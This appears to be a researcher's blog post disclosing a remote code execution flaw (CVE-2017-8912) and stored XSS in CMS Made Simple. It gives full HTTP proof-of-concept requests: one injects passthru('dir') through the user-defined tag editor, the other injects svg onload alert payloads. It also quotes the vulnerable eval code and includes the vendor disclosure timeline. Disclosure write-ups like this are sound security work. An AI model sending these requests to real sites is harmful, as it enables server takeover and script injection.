One day I felt like reviewing the source code of some random CMS and I picked CMSMS. This is totally random and I did this to kill boredom.
Remote Code Execution – CVE-2017-8912
In admin/editusertag.php you can create custom user defined tags in which evil PHP functions are not blacklisted.
[code language=”text”]
POST /cms/cmsimple/admin/editusertag.php?_sk_=2a7da2216d41e0ac&userplugin_id=4 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://localhost/cms/cmsimple/admin/editusertag.php?_sk_=2a7da2216d41e0ac&userplugin_id=4
Content-Length: 115
Cookie: cms_admin_user_id=1; cms_passhash=4df45e48ad5885afabe27e446666421b; _sk_=2a7da2216d41e0ac; CMSSESSIDacef9ab5f31b=mckpbvrmtj7n6ri53kiol718c5
Connection: close
Pragma: no-cache
Cache-Control: no-cache
_sk_=2a7da2216d41e0ac&userplugin_id=4&userplugin_name=aaa&code=passthru(‘dir’)%3B&description=&run=1&apply=1&ajax=1
[/code]
File: lib/classes/class.usertagoperations.inc.php
Line: 251
[code language=”php” highlight=”8″]
function CallUserTag($name, &$params)
{
$row = $this->_get_from_cache($name);
$result = FALSE;
if( $row ) {
$smarty = CmsApp::get_instance()->GetSmarty();
$functionname = $this->CreateTagFunction($name);
$result = call_user_func_array($functionname, array(&$params, &$smarty));
}
return $result;
}
function CreateTagFunction($name)
{
$row = $this->_get_from_cache($name);
if( !$row ) return;
$functionname = ‘cms_user_tag_’.$name;
if( !function_exists($functionname) ) {
if( startswith($row[‘code’],'<?php’) ) $row[‘code’] = substr($row[‘code’],5);
if( endswith($row[‘code’],’?>’) ) $row[‘code’] = substr($row[‘code’],0,-2);
$code = ‘function ‘.$functionname.'($params,&$smarty) {‘.$row[‘code’]."\n}";
@eval($code);
}
return $functionname;
[/code]
The function ‘CreateTagFunction’ will create an executable function and ‘call_user_func_array’ in ‘CallUserTag’ that will execute our code.
In a corporate network once an attacker finds admin credentials by accessing the database and if he finds CMSMS he can easily get a reverse shell on the box. Reminds me of some boxes in the PWK lab 😉
Stored XSS
File: admin/addgroup.php
Lines: 95, 99
[code language=”php” highlight=”3,7″ htmlscript=”true”]
<div class="pageoverflow">
<p class="pagetext"><label for="groupname">*<?php echo lang(‘name’)?>:</label></p>
<p class="pageinput"><input type="text" id="groupname" name="group" maxlength="255" value="<?php echo $group?>" /></p>
</div>
<div class="pageoverflow">
<p class="pagetext"><label for="description"><?php echo lang(‘description’)?>:</label></p>
<p class="pageinput"><input type="text" id="description" name="description" maxlength="255" size="80" value="<?php echo $description?>" /></p>
</div>
[/code]
The ‘groupname’ and ‘description’ fields are not properly sanitized, thus leading to XSS.
[code language=”text”]
POST /cms/cmsimple/admin/addgroup.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/cms/cmsimple/admin/addgroup.php?_sk_=92a32a8aaa87e958
Cookie: cms_admin_user_id=1; cms_passhash=4df45e48ad5885afabe27e446666421b; _sk_=92a32a8aaa87e958; CMSSESSIDacef9ab5f31b=mckpbvrmtj7n6ri53kiol718c5
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 137
_sk_=92a32a8aaa87e958&group=%3Csvg%2Fonload%3Dalert%282%29%3E&description=%22%3E%3Csvg%2Fonload%3Dalert%283%29%3E&active=on&addgroup=true
[/code]
Disclosure Timeline
09-05-2017: Reported to the vendor
09-05-2017: Vendor doesn’t accept XSS issues inside admin panel and claimed the RCE as a feature, not a bug 🙂
10-05-2017: Public disclosure
11-05-2017: Assigned CVE-2017-8912
https://www.exploit-db.com/exploits/41997/
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8912
https://nvd.nist.gov/vuln/detail/CVE-2017-8912